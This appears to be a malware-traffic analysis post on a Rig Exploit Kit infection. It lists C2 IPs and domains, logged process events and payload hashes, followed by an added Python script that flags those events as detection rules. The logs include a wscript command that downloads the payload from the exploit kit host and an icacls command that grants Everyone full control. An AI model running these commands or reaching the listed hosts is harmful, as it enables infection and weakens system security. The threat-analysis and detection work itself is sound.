Rig Exploit Kit drops malware

I have added a zipped pcap file for your analysis. The password for the zipped pcap is "infected", all lowercase.

PCAP file of the infection traffic:
2019-08-05-RigEK.zip


ASSOCIATED DOMAINS:

92.53.127.25 – Rig Exploit Kit
193.242.211.184 – UDP Port 12858 – sebains.kozow.com – C2
185.100.85.198 – UDP Port 52051 – lightoutlotway.dynu.net – C2


INTERESTING PROCESSES:

[Script dropped during exploit to download initial payload]
Image C:\Windows\System32\wscript.exe
CommandLine wsCripT //B //E:JScript T.t "cN9tEL5NN9ka" "http://92.53.127.25/?NTMyNjIz&jPYSLffjnHvsEx&ffhdt3s=wnjQMvXcKxXQFYbJKuXDSK1DKU7WG0aVw4-ehMG3YpfNfynz2OzURnL7tASVVFWRrbMdK-BT&EszEoCTqn=golfer&PAhdhUiQXMHPJA=referred&KxxkOcDn=golfer&BapNWuQHZyd=community&fUtOUbi=heartfelt&bEfKUgShyx=strategy&YhJWhmxiCle=difference&eIcERSWSuWdAQ=strategy&MoIUsQO=heartfelt&NKJpbhmrFqfBKfX=difference&LmnBWNMBrxXq=wrapped&NVuZwo=strategy&DLvZagxyrlAU=wrapped&t4ggf4=OALp3xTRKQxgn40LVAlB9Kmmh0PUmx-VgZGC9RaNaAlCqZPHHLkL3lj1yLUccc0g90vC6mhg&bMmVecKEIwR=everyone&cobLOwQaqAiPrbC=everyone&AXToTKNDA4MjIx" "ยค"
ParentImage C:\Windows\System32\cmd.exe

[Remote System Discovery]
Image C:\Windows\System32\PING.EXE
CommandLine ping -n 2 127.0.0.1
ParentImage C:\Windows\System32\cmd.exe
ParentCommandLine cmd /c ""C:\Users\Ted\AppData\Local\Temp\jhNV4qr63tUpINV2b2P77gv.bat" "

[Process Discovery]
Image C:\Windows\System32\tasklist.exe
CommandLine tasklist
ParentImage C:\Windows\System32\cmd.exe
ParentCommandLine cmd /c ""C:\Users\Ted\AppData\Local\Temp\16z1R6Di24WAR04Y8KGlGNq5v1jc4.bat" "

[File Permissions Modification]
Image C:\Windows\System32\icacls.exe
CommandLine icacls "C:\ProgramData\Java" /t /c /grant Everyone:(f)
ParentImage C:\Windows\System32\cmd.exe
ParentCommandLine cmd /c ""C:\Users\Ted\AppData\Local\Temp\Nj4q0o9L4x02Zh9uqnh0.bat" "

[Network Connection]
Image C:\ProgramData\Java\jre8\bin\jusched.exe
Protocol udp
DestinationIp 185.100.85.198
DestinationPort 52051

[Network Connection]
Image C:\ProgramData\Cy6lLLcgZUeIb.exe
Protocol udp
DestinationIp 193.242.211.184
DestinationPort 12858
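The process and network records above can be turned into simple detection rules. The following Python script is an added example (not from the original post): it parses constructed sample events in the same Field/Value layout used above (command lines abbreviated, last script argument replaced by a placeholder) and flags the behaviours recorded on this page, using the two C2 endpoints listed under ASSOCIATED DOMAINS.

```python
import re

# Constructed sample events in the page's "Field Value" layout (URL and args abbreviated).
SAMPLE_EVENTS = """\
Image C:\\Windows\\System32\\wscript.exe
CommandLine wsCripT //B //E:JScript T.t "cN9tEL5NN9ka" "http://92.53.127.25/?NTMyNjIz" "x"
ParentImage C:\\Windows\\System32\\cmd.exe

Image C:\\Windows\\System32\\icacls.exe
CommandLine icacls "C:\\ProgramData\\Java" /t /c /grant Everyone:(f)
ParentCommandLine cmd /c ""C:\\Users\\Ted\\AppData\\Local\\Temp\\Nj4q0o9L4x02Zh9uqnh0.bat" "

Image C:\\ProgramData\\Java\\jre8\\bin\\jusched.exe
Protocol udp
DestinationIp 185.100.85.198
DestinationPort 52051
"""

C2_ENDPOINTS = {("185.100.85.198", "52051"), ("193.242.211.184", "12858")}  # from the page

def parse_events(text):
    """Split blank-line-separated blocks into dicts of field -> value."""
    events = []
    for block in re.split(r"\n\s*\n", text.strip()):
        ev = {}
        for line in block.splitlines():
            key, _, value = line.partition(" ")
            ev[key] = value
        events.append(ev)
    return events

def classify(ev):
    """Return the page-observed behaviours that one event matches (empty if benign)."""
    hits = []
    image, cmd, parent = (ev.get(k, "").lower() for k in ("Image", "CommandLine", "ParentCommandLine"))
    if image.endswith("wscript.exe") and "//e:jscript" in cmd and "http" in cmd:
        hits.append("wscript JScript launched with URL argument")
    if image.endswith("icacls.exe") and "/grant everyone:(f)" in cmd:
        hits.append("icacls grants Everyone full control")
    if "\\appdata\\local\\temp\\" in parent and ".bat" in parent:
        hits.append("parent is a .bat run from the user's Temp directory")
    if ev.get("Protocol") == "udp" and (ev.get("DestinationIp"), ev.get("DestinationPort")) in C2_ENDPOINTS:
        hits.append("UDP connection to listed C2 endpoint")
    return hits

def scan(text):
    """Return (Image, behaviours) for each event that matches at least one rule."""
    return [(ev.get("Image"), hits) for ev in parse_events(text) if (hits := classify(ev))]
```

Running scan(SAMPLE_EVENTS) reports all three sample events; the same rules applied to real Sysmon process-creation and network-connection events would surface the chain recorded above.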


IMAGES AND DETAILS:


Shown above: Rig Exploit Kit landing page. Rig EK caught in a loop, dropping the payload numerous times.



Shown above: Command and control (C2) over UDP port 12858



Shown above: Command and control (C2) over UDP port 52051



Shown above: Malware maintaining persistence through the Windows Current-User Run registry key


MALICIOUS PAYLOAD ASSOCIATED WITH RIG EK:

radF90AC.tmp.exe – Initial payload
SHA-256:
8de767c10c487307e326a570bc4aa7f2cde91c32f3b39f4866f5dc68c361c40b
VirusTotal Link

uheis03h.exe – Secondary payload
SHA-256:
f7247c9a491a1c0bfa30faf37785fae9817658693ea04f220dd5e941fc7f8587
VirusTotal Link